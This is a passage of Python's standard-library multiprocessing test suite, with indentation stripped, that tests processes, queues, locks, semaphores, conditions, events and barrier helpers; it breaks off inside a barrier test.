if os.name != 'nt':
self.assertEqual(exitcode, -signal.SIGKILL)
def test_cpu_count(self):
try:
cpus = multiprocessing.cpu_count()
except NotImplementedError:
cpus = 1
self.assertTrue(type(cpus) is int)
self.assertTrue(cpus >= 1)
def test_active_children(self):
self.assertEqual(type(self.active_children()), list)
p = self.Process(target=time.sleep, args=(DELTA,))
self.assertNotIn(p, self.active_children())
p.daemon = True
p.start()
self.assertIn(p, self.active_children())
p.join()
self.assertNotIn(p, self.active_children())
@classmethod
def _test_recursion(cls, wconn, id):
wconn.send(id)
if len(id) < 2:
for i in range(2):
p = cls.Process(
target=cls._test_recursion, args=(wconn, id+[i])
)
p.start()
p.join()
def test_recursion(self):
rconn, wconn = self.Pipe(duplex=False)
self._test_recursion(wconn, [])
time.sleep(DELTA)
result = []
while rconn.poll():
result.append(rconn.recv())
expected = [
[],
[0],
[0, 0],
[0, 1],
[1],
[1, 0],
[1, 1]
]
self.assertEqual(result, expected)
@classmethod
def _test_sentinel(cls, event):
event.wait(10.0)
def test_sentinel(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
event = self.Event()
p = self.Process(target=self._test_sentinel, args=(event,))
with self.assertRaises(ValueError):
p.sentinel
p.start()
self.addCleanup(p.join)
sentinel = p.sentinel
self.assertIsInstance(sentinel, int)
self.assertFalse(wait_for_handle(sentinel, timeout=0.0))
event.set()
p.join()
self.assertTrue(wait_for_handle(sentinel, timeout=1))
@classmethod
def _test_close(cls, rc=0, q=None):
if q is not None:
q.get()
sys.exit(rc)
def test_close(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
q = self.Queue()
p = self.Process(target=self._test_close, kwargs={'q': q})
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
# Child is still alive, cannot close
with self.assertRaises(ValueError):
p.close()
q.put(None)
p.join()
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.exitcode, 0)
p.close()
with self.assertRaises(ValueError):
p.is_alive()
with self.assertRaises(ValueError):
p.join()
with self.assertRaises(ValueError):
p.terminate()
p.close()
wr = weakref.ref(p)
del p
gc.collect()
self.assertIs(wr(), None)
close_queue(q)
def test_many_processes(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
N = 5 if sm == 'spawn' else 100
# Try to overwhelm the forkserver loop with events
procs = [self.Process(target=self._test_sleep, args=(0.01,))
for i in range(N)]
for p in procs:
p.start()
for p in procs:
join_process(p)
for p in procs:
self.assertEqual(p.exitcode, 0)
procs = [self.Process(target=self._sleep_some)
for i in range(N)]
for p in procs:
p.start()
time.sleep(0.001) # let the children start...
for p in procs:
p.terminate()
for p in procs:
join_process(p)
if os.name != 'nt':
exitcodes = [-signal.SIGTERM]
if sys.platform == 'darwin':
# bpo-31510: On macOS, killing a freshly started process with
# SIGTERM sometimes kills the process with SIGKILL.
exitcodes.append(-signal.SIGKILL)
for p in procs:
self.assertIn(p.exitcode, exitcodes)
def test_lose_target_ref(self):
c = DummyCallable()
wr = weakref.ref(c)
q = self.Queue()
p = self.Process(target=c, args=(q, c))
del c
p.start()
p.join()
gc.collect() # For PyPy or other GCs.
self.assertIs(wr(), None)
self.assertEqual(q.get(), 5)
close_queue(q)
@classmethod
def _test_child_fd_inflation(self, evt, q):
q.put(test.support.fd_count())
evt.wait()
def test_child_fd_inflation(self):
# Number of fds in child processes should not grow with the
# number of running children.
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
if sm == 'fork':
# The fork method by design inherits all fds from the parent,
# trying to go against it is a lost battle
self.skipTest('test not appropriate for {}'.format(sm))
N = 5
evt = self.Event()
q = self.Queue()
procs = [self.Process(target=self._test_child_fd_inflation, args=(evt, q))
for i in range(N)]
for p in procs:
p.start()
try:
fd_counts = [q.get() for i in range(N)]
self.assertEqual(len(set(fd_counts)), 1, fd_counts)
finally:
evt.set()
for p in procs:
p.join()
close_queue(q)
@classmethod
def _test_wait_for_threads(self, evt):
def func1():
time.sleep(0.5)
evt.set()
def func2():
time.sleep(20)
evt.clear()
threading.Thread(target=func1).start()
threading.Thread(target=func2, daemon=True).start()
def test_wait_for_threads(self):
# A child process should wait for non-daemonic threads to end
# before exiting
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
evt = self.Event()
proc = self.Process(target=self._test_wait_for_threads, args=(evt,))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
@classmethod
def _test_error_on_stdio_flush(self, evt, break_std_streams={}):
for stream_name, action in break_std_streams.items():
if action == 'close':
stream = io.StringIO()
stream.close()
else:
assert action == 'remove'
stream = None
setattr(sys, stream_name, None)
evt.set()
def test_error_on_stdio_flush_1(self):
# Check that Process works with broken standard streams
streams = [io.StringIO(), None]
streams[0].close()
for stream_name in ('stdout', 'stderr'):
for stream in streams:
old_stream = getattr(sys, stream_name)
setattr(sys, stream_name, stream)
try:
evt = self.Event()
proc = self.Process(target=self._test_error_on_stdio_flush,
args=(evt,))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
self.assertEqual(proc.exitcode, 0)
finally:
setattr(sys, stream_name, old_stream)
def test_error_on_stdio_flush_2(self):
# Same as test_error_on_stdio_flush_1(), but standard streams are
# broken by the child process
for stream_name in ('stdout', 'stderr'):
for action in ('close', 'remove'):
old_stream = getattr(sys, stream_name)
try:
evt = self.Event()
proc = self.Process(target=self._test_error_on_stdio_flush,
args=(evt, {stream_name: action}))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
self.assertEqual(proc.exitcode, 0)
finally:
setattr(sys, stream_name, old_stream)
@classmethod
def _sleep_and_set_event(self, evt, delay=0.0):
time.sleep(delay)
evt.set()
def check_forkserver_death(self, signum):
# bpo-31308: if the forkserver process has died, we should still
# be able to create and run new Process instances (the forkserver
# is implicitly restarted).
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
if sm != 'forkserver':
            # This test requires the forkserver start method; skip for any
            # other start method.
self.skipTest('test not appropriate for {}'.format(sm))
from multiprocessing.forkserver import _forkserver
_forkserver.ensure_running()
# First process sleeps 500 ms
delay = 0.5
evt = self.Event()
proc = self.Process(target=self._sleep_and_set_event, args=(evt, delay))
proc.start()
pid = _forkserver._forkserver_pid
os.kill(pid, signum)
# give time to the fork server to die and time to proc to complete
time.sleep(delay * 2.0)
evt2 = self.Event()
proc2 = self.Process(target=self._sleep_and_set_event, args=(evt2,))
proc2.start()
proc2.join()
self.assertTrue(evt2.is_set())
self.assertEqual(proc2.exitcode, 0)
proc.join()
self.assertTrue(evt.is_set())
self.assertIn(proc.exitcode, (0, 255))
def test_forkserver_sigint(self):
# Catchable signal
self.check_forkserver_death(signal.SIGINT)
def test_forkserver_sigkill(self):
# Uncatchable signal
if os.name != 'nt':
self.check_forkserver_death(signal.SIGKILL)
#
#
#
class _UpperCaser(multiprocessing.Process):
def __init__(self):
multiprocessing.Process.__init__(self)
self.child_conn, self.parent_conn = multiprocessing.Pipe()
def run(self):
self.parent_conn.close()
for s in iter(self.child_conn.recv, None):
self.child_conn.send(s.upper())
self.child_conn.close()
def submit(self, s):
assert type(s) is str
self.parent_conn.send(s)
return self.parent_conn.recv()
def stop(self):
self.parent_conn.send(None)
self.parent_conn.close()
self.child_conn.close()
class _TestSubclassingProcess(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_subclassing(self):
uppercaser = _UpperCaser()
uppercaser.daemon = True
uppercaser.start()
self.assertEqual(uppercaser.submit('hello'), 'HELLO')
self.assertEqual(uppercaser.submit('world'), 'WORLD')
uppercaser.stop()
uppercaser.join()
def test_stderr_flush(self):
# sys.stderr is flushed at process shutdown (issue #13812)
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
proc = self.Process(target=self._test_stderr_flush, args=(testfn,))
proc.start()
proc.join()
with open(testfn, 'r') as f:
err = f.read()
# The whole traceback was printed
self.assertIn("ZeroDivisionError", err)
self.assertIn("test_multiprocessing.py", err)
self.assertIn("1/0 # MARKER", err)
@classmethod
def _test_stderr_flush(cls, testfn):
fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
sys.stderr = open(fd, 'w', closefd=False)
1/0 # MARKER
@classmethod
def _test_sys_exit(cls, reason, testfn):
fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
sys.stderr = open(fd, 'w', closefd=False)
sys.exit(reason)
def test_sys_exit(self):
# See Issue 13854
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
for reason in (
[1, 2, 3],
'ignore this',
):
p = self.Process(target=self._test_sys_exit, args=(reason, testfn))
p.daemon = True
p.start()
join_process(p)
self.assertEqual(p.exitcode, 1)
with open(testfn, 'r') as f:
content = f.read()
self.assertEqual(content.rstrip(), str(reason))
os.unlink(testfn)
cases = [
((True,), 1),
((False,), 0),
((8,), 8),
((None,), 0),
((), 0),
]
for args, expected in cases:
with self.subTest(args=args):
p = self.Process(target=sys.exit, args=args)
p.daemon = True
p.start()
join_process(p)
self.assertEqual(p.exitcode, expected)
#
#
#
def queue_empty(q):
if hasattr(q, 'empty'):
return q.empty()
else:
return q.qsize() == 0
def queue_full(q, maxsize):
if hasattr(q, 'full'):
return q.full()
else:
return q.qsize() == maxsize
class _TestQueue(BaseTestCase):
@classmethod
def _test_put(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
for i in range(6):
queue.get()
parent_can_continue.set()
def test_put(self):
MAXSIZE = 6
queue = self.Queue(maxsize=MAXSIZE)
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_put,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
queue.put(1)
queue.put(2, True)
queue.put(3, True, None)
queue.put(4, False)
queue.put(5, False, None)
queue.put_nowait(6)
# the values may be in buffer but not yet in pipe so sleep a bit
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
self.assertEqual(queue_full(queue, MAXSIZE), True)
put = TimingWrapper(queue.put)
put_nowait = TimingWrapper(queue.put_nowait)
self.assertRaises(pyqueue.Full, put, 7, False)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, False, None)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put_nowait, 7)
self.assertTimingAlmostEqual(put_nowait.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, TIMEOUT1)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Full, put, 7, False, TIMEOUT2)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT3)
child_can_start.set()
parent_can_continue.wait()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
proc.join()
close_queue(queue)
@classmethod
def _test_get(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
#queue.put(1)
queue.put(2)
queue.put(3)
queue.put(4)
queue.put(5)
parent_can_continue.set()
def test_get(self):
queue = self.Queue()
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_get,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
child_can_start.set()
parent_can_continue.wait()
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
# Hangs unexpectedly, remove for now
#self.assertEqual(queue.get(), 1)
self.assertEqual(queue.get(True, None), 2)
self.assertEqual(queue.get(True), 3)
self.assertEqual(queue.get(timeout=1), 4)
self.assertEqual(queue.get_nowait(), 5)
self.assertEqual(queue_empty(queue), True)
get = TimingWrapper(queue.get)
get_nowait = TimingWrapper(queue.get_nowait)
self.assertRaises(pyqueue.Empty, get, False)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, False, None)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get_nowait)
self.assertTimingAlmostEqual(get_nowait.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, True, TIMEOUT1)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Empty, get, False, TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT3)
proc.join()
close_queue(queue)
@classmethod
def _test_fork(cls, queue):
for i in range(10, 20):
queue.put(i)
# note that at this point the items may only be buffered, so the
        # process cannot shut down until the feeder thread has finished
# pushing items onto the pipe.
def test_fork(self):
# Old versions of Queue would fail to create a new feeder
# thread for a forked process if the original process had its
# own feeder thread. This test checks that this no longer
# happens.
queue = self.Queue()
# put items on queue so that main process starts a feeder thread
for i in range(10):
queue.put(i)
# wait to make sure thread starts before we fork a new process
time.sleep(DELTA)
# fork process
p = self.Process(target=self._test_fork, args=(queue,))
p.daemon = True
p.start()
# check that all expected items are in the queue
for i in range(20):
self.assertEqual(queue.get(), i)
self.assertRaises(pyqueue.Empty, queue.get, False)
p.join()
close_queue(queue)
def test_qsize(self):
q = self.Queue()
try:
self.assertEqual(q.qsize(), 0)
except NotImplementedError:
self.skipTest('qsize method not implemented')
q.put(1)
self.assertEqual(q.qsize(), 1)
q.put(5)
self.assertEqual(q.qsize(), 2)
q.get()
self.assertEqual(q.qsize(), 1)
q.get()
self.assertEqual(q.qsize(), 0)
close_queue(q)
@classmethod
def _test_task_done(cls, q):
for obj in iter(q.get, None):
time.sleep(DELTA)
q.task_done()
def test_task_done(self):
queue = self.JoinableQueue()
workers = [self.Process(target=self._test_task_done, args=(queue,))
for i in range(4)]
for p in workers:
p.daemon = True
p.start()
for i in range(10):
queue.put(i)
queue.join()
for p in workers:
queue.put(None)
for p in workers:
p.join()
close_queue(queue)
def test_no_import_lock_contention(self):
with test.support.temp_cwd():
module_name = 'imported_by_an_imported_module'
with open(module_name + '.py', 'w') as f:
f.write("""if 1:
import multiprocessing
q = multiprocessing.Queue()
q.put('knock knock')
q.get(timeout=3)
q.close()
del q
""")
with test.support.DirsOnSysPath(os.getcwd()):
try:
__import__(module_name)
except pyqueue.Empty:
self.fail("Probable regression on import lock contention;"
" see Issue #22853")
def test_timeout(self):
q = multiprocessing.Queue()
start = time.monotonic()
self.assertRaises(pyqueue.Empty, q.get, True, 0.200)
delta = time.monotonic() - start
# bpo-30317: Tolerate a delta of 100 ms because of the bad clock
# resolution on Windows (usually 15.6 ms). x86 Windows7 3.x once
# failed because the delta was only 135.8 ms.
self.assertGreaterEqual(delta, 0.100)
close_queue(q)
def test_queue_feeder_donot_stop_onexc(self):
# bpo-30414: verify feeder handles exceptions correctly
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class NotSerializable(object):
def __reduce__(self):
raise AttributeError
with test.support.captured_stderr():
q = self.Queue()
q.put(NotSerializable())
q.put(True)
self.assertTrue(q.get(timeout=support.SHORT_TIMEOUT))
close_queue(q)
with test.support.captured_stderr():
# bpo-33078: verify that the queue size is correctly handled
# on errors.
q = self.Queue(maxsize=1)
q.put(NotSerializable())
q.put(True)
try:
self.assertEqual(q.qsize(), 1)
except NotImplementedError:
# qsize is not available on all platforms as it
# relies on sem_getvalue
pass
self.assertTrue(q.get(timeout=support.SHORT_TIMEOUT))
# Check that the size of the queue is correct
self.assertTrue(q.empty())
close_queue(q)
def test_queue_feeder_on_queue_feeder_error(self):
# bpo-30006: verify feeder handles exceptions using the
# _on_queue_feeder_error hook.
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class NotSerializable(object):
"""Mock unserializable object"""
def __init__(self):
self.reduce_was_called = False
self.on_queue_feeder_error_was_called = False
def __reduce__(self):
self.reduce_was_called = True
raise AttributeError
class SafeQueue(multiprocessing.queues.Queue):
"""Queue with overloaded _on_queue_feeder_error hook"""
@staticmethod
def _on_queue_feeder_error(e, obj):
if (isinstance(e, AttributeError) and
isinstance(obj, NotSerializable)):
obj.on_queue_feeder_error_was_called = True
not_serializable_obj = NotSerializable()
# The captured_stderr reduces the noise in the test report
with test.support.captured_stderr():
q = SafeQueue(ctx=multiprocessing.get_context())
q.put(not_serializable_obj)
# Verify that q is still functioning correctly
q.put(True)
self.assertTrue(q.get(timeout=support.SHORT_TIMEOUT))
# Assert that the serialization and the hook have been called correctly
self.assertTrue(not_serializable_obj.reduce_was_called)
self.assertTrue(not_serializable_obj.on_queue_feeder_error_was_called)
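# (Editorial note: _on_queue_feeder_error is a private hook; the stock Queue
# implementation simply reports the exception, whereas a subclass like the
# SafeQueue above can override it, e.g. to log and drop objects that fail
# to pickle instead of polluting stderr.)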
def test_closed_queue_put_get_exceptions(self):
for q in multiprocessing.Queue(), multiprocessing.JoinableQueue():
q.close()
with self.assertRaisesRegex(ValueError, 'is closed'):
q.put('foo')
with self.assertRaisesRegex(ValueError, 'is closed'):
q.get()
#
#
#
class _TestLock(BaseTestCase):
def test_lock(self):
lock = self.Lock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(False), False)
self.assertEqual(lock.release(), None)
self.assertRaises((ValueError, threading.ThreadError), lock.release)
def test_rlock(self):
lock = self.RLock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertRaises((AssertionError, RuntimeError), lock.release)
def test_lock_context(self):
with self.Lock():
pass
class _TestSemaphore(BaseTestCase):
def _test_semaphore(self, sem):
self.assertReturnsIfImplemented(2, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.acquire(False), False)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(2, get_value, sem)
def test_semaphore(self):
sem = self.Semaphore(2)
self._test_semaphore(sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(3, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(4, get_value, sem)
def test_bounded_semaphore(self):
sem = self.BoundedSemaphore(2)
self._test_semaphore(sem)
# Currently fails on macOS
#if HAVE_GETVALUE:
# self.assertRaises(ValueError, sem.release)
# self.assertReturnsIfImplemented(2, get_value, sem)
def test_timeout(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sem = self.Semaphore(0)
acquire = TimingWrapper(sem.acquire)
self.assertEqual(acquire(False), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, None), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, TIMEOUT1), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0)
self.assertEqual(acquire(True, TIMEOUT2), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT2)
self.assertEqual(acquire(timeout=TIMEOUT3), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT3)
class _TestCondition(BaseTestCase):
@classmethod
def f(cls, cond, sleeping, woken, timeout=None):
cond.acquire()
sleeping.release()
cond.wait(timeout)
woken.release()
cond.release()
def assertReachesEventually(self, func, value):
for i in range(10):
try:
if func() == value:
break
except NotImplementedError:
break
time.sleep(DELTA)
time.sleep(DELTA)
self.assertReturnsIfImplemented(value, func)
def check_invariant(self, cond):
# this is only supposed to succeed when there are no sleepers
if self.TYPE == 'processes':
try:
sleepers = (cond._sleeping_count.get_value() -
cond._woken_count.get_value())
self.assertEqual(sleepers, 0)
self.assertEqual(cond._wait_semaphore.get_value(), 0)
except NotImplementedError:
pass
def test_notify(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
p = threading.Thread(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
# wait for both children to start sleeping
sleeping.acquire()
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake up one process/thread
cond.acquire()
cond.notify()
cond.release()
# check one process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(1, get_value, woken)
# wake up another
cond.acquire()
cond.notify()
cond.release()
# check other has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(2, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
p.join()
def test_notify_all(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes which will timeout
for i in range(3):
p = self.Process(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them all to sleep
for i in range(6):
sleeping.acquire()
# check they have all timed out
for i in range(6):
woken.acquire()
self.assertReturnsIfImplemented(0, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
# start some more threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake them all up
cond.acquire()
cond.notify_all()
cond.release()
# check they have all woken
self.assertReachesEventually(lambda: get_value(woken), 6)
# check state is not mucked up
self.check_invariant(cond)
def test_notify_n(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake some of them up
cond.acquire()
cond.notify(n=2)
cond.release()
# check 2 have woken
self.assertReachesEventually(lambda: get_value(woken), 2)
# wake the rest of them
cond.acquire()
cond.notify(n=4)
cond.release()
self.assertReachesEventually(lambda: get_value(woken), 6)
# doesn't do anything more
cond.acquire()
cond.notify(n=3)
cond.release()
self.assertReturnsIfImplemented(6, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
def test_timeout(self):
cond = self.Condition()
wait = TimingWrapper(cond.wait)
cond.acquire()
res = wait(TIMEOUT1)
cond.release()
self.assertEqual(res, False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
@classmethod
def _test_waitfor_f(cls, cond, state):
with cond:
state.value = 0
cond.notify()
result = cond.wait_for(lambda : state.value==4)
if not result or state.value != 4:
sys.exit(1)
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', -1)
p = self.Process(target=self._test_waitfor_f, args=(cond, state))
p.daemon = True
p.start()
with cond:
result = cond.wait_for(lambda : state.value==0)
self.assertTrue(result)
self.assertEqual(state.value, 0)
for i in range(4):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
join_process(p)
self.assertEqual(p.exitcode, 0)
@classmethod
def _test_waitfor_timeout_f(cls, cond, state, success, sem):
sem.release()
with cond:
expected = 0.1
dt = time.monotonic()
result = cond.wait_for(lambda : state.value==4, timeout=expected)
dt = time.monotonic() - dt
# borrow logic in assertTimeout() from test/lock_tests.py
if not result and expected * 0.6 < dt < expected * 10.0:
success.value = True
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor_timeout(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', 0)
success = self.Value('i', False)
sem = self.Semaphore(0)
p = self.Process(target=self._test_waitfor_timeout_f,
args=(cond, state, success, sem))
p.daemon = True
p.start()
self.assertTrue(sem.acquire(timeout=support.LONG_TIMEOUT))
# Only increment 3 times, so state == 4 is never reached.
for i in range(3):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
join_process(p)
self.assertTrue(success.value)
@classmethod
def _test_wait_result(cls, c, pid):
with c:
c.notify()
time.sleep(1)
if pid is not None:
os.kill(pid, signal.SIGINT)
def test_wait_result(self):
if isinstance(self, ProcessesMixin) and sys.platform != 'win32':
pid = os.getpid()
else:
pid = None
c = self.Condition()
with c:
self.assertFalse(c.wait(0))
self.assertFalse(c.wait(0.1))
p = self.Process(target=self._test_wait_result, args=(c, pid))
p.start()
self.assertTrue(c.wait(60))
if pid is not None:
self.assertRaises(KeyboardInterrupt, c.wait, 60)
p.join()
class _TestEvent(BaseTestCase):
@classmethod
def _test_event(cls, event):
time.sleep(TIMEOUT2)
event.set()
def test_event(self):
event = self.Event()
wait = TimingWrapper(event.wait)
# Removed temporarily: due to API shear this does not
# work with threading._Event objects (is_set == isSet).
self.assertEqual(event.is_set(), False)
# Removed: threading.Event.wait() returns the value of the __flag
# instead of None; API shear with the semaphore-backed mp.Event.
self.assertEqual(wait(0.0), False)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
event.set()
# See note above on the API differences
self.assertEqual(event.is_set(), True)
self.assertEqual(wait(), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
# self.assertEqual(event.is_set(), True)
event.clear()
#self.assertEqual(event.is_set(), False)
p = self.Process(target=self._test_event, args=(event,))
p.daemon = True
p.start()
self.assertEqual(wait(), True)
p.join()
#
# Tests for Barrier - adapted from tests in test/lock_tests.py
#
# Many of the tests for threading.Barrier use a list as an atomic
# counter: a value is appended to increment the counter, and the
# length of the list gives the value. We use the class _DummyList
# for the same purpose.
class _DummyList(object):
def __init__(self):
wrapper = multiprocessing.heap.BufferWrapper(struct.calcsize('i'))
lock = multiprocessing.Lock()
self.__setstate__((wrapper, lock))
self._lengthbuf[0] = 0
def __setstate__(self, state):
(self._wrapper, self._lock) = state
self._lengthbuf = self._wrapper.create_memoryview().cast('i')
def __getstate__(self):
return (self._wrapper, self._lock)
def append(self, _):
with self._lock:
self._lengthbuf[0] += 1
def __len__(self):
with self._lock:
return self._lengthbuf[0]
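# Illustrative sketch (not part of the original test code): _DummyList only
# supports the append()/len() subset of the list API, backed by shared memory,
# so it can serve as a process-safe counter:
#     counter = _DummyList()
#     counter.append(True)   # increment
#     counter.append(True)   # increment
#     assert len(counter) == 2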
def _wait():
# A crude wait/yield function not relying on synchronization primitives.
time.sleep(0.01)
class Bunch(object):
"""
A bunch of threads.
"""
def __init__(self, namespace, f, args, n, wait_before_exit=False):
"""
Construct a bunch of `n` threads running the same function `f`.
If `wait_before_exit` is True, the threads won't terminate until
do_finish() is called.
"""
self.f = f
self.args = args
self.n = n
self.started = namespace.DummyList()
self.finished = namespace.DummyList()
self._can_exit = namespace.Event()
if not wait_before_exit:
self._can_exit.set()
threads = []
for i in range(n):
p = namespace.Process(target=self.task)
p.daemon = True
p.start()
threads.append(p)
def finalize(threads):
for p in threads:
p.join()
self._finalizer = weakref.finalize(self, finalize, threads)
def task(self):
pid = os.getpid()
self.started.append(pid)
try:
self.f(*self.args)
finally:
self.finished.append(pid)
self._can_exit.wait(30)
assert self._can_exit.is_set()
def wait_for_started(self):
while len(self.started) < self.n:
_wait()
def wait_for_finished(self):
while len(self.finished) < self.n:
_wait()
def do_finish(self):
self._can_exit.set()
def close(self):
self._finalizer()
class AppendTrue(object):
def __init__(self, obj):
self.obj = obj
def __call__(self):
self.obj.append(True)
class _TestBarrier(BaseTestCase):
"""
Tests for Barrier objects.
"""
N = 5
defaultTimeout = 30.0 # XXX Slow Windows buildbots need generous timeout
def setUp(self):
self.barrier = self.Barrier(self.N, timeout=self.defaultTimeout)
def tearDown(self):
self.barrier.abort()
self.barrier = None
def DummyList(self):
if self.TYPE == 'threads':
return []
elif self.TYPE == 'manager':
return self.manager.list()
else:
return _DummyList()
def run_threads(self, f, args):
b = Bunch(self, f, args, self.N-1)
try:
f(*args)
b.wait_for_finished()
finally:
b.close()
@classmethod
def multipass(cls, barrier, results, n):
m = barrier.parties
assert m == cls.N
for i in range(n):
results[0].append(True)
assert len(results[1]) == i * m
barrier.wait()
results[1].append(True)
assert len(results[0]) == (i + 1) * m
barrier.wait()
try:
assert barrier.n_waiting == 0
except NotImplementedError:
pass
assert not barrier.broken
def test_barrier(self, passes=1):
"""
Test that a barrier is passed in lockstep
"""
results = [self.DummyList(), self.DummyList()]
self.run_threads(self.multipass, (self.barrier, results, passes))
def test_barrier_10(self):
"""
